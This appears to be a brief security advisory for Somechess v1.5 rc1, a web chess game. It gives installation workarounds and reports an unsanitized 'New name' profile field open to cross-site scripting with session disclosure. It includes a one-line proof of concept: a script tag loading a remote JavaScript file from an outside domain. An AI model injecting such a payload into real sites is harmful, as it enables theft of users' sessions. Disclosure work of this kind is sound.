Somechess v1.5 rc1
Homepage:
http://www.astrodogpress.org/chess/
Affected files:
*Profile input boxes
Upon dumping the sql data into the table if you get errors and it wont create the tables & data (like
it did to me), then just remove all the " from the sql file. You'll also have to manually add players &
their pw's (md5 hashed) via phpmyadmin or whatever you use. Theres also a php error on menu.php that
you'll have to fix since it won't allow you to connect to the game DB
XSS vuln with session disclosure from "New name" profile input box.
Data isn't sanatized before being generated. PoC:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://youfucktard.com/xsp/somechess1.jpg
http://youfucktard.com/xsp/somechess2.jpg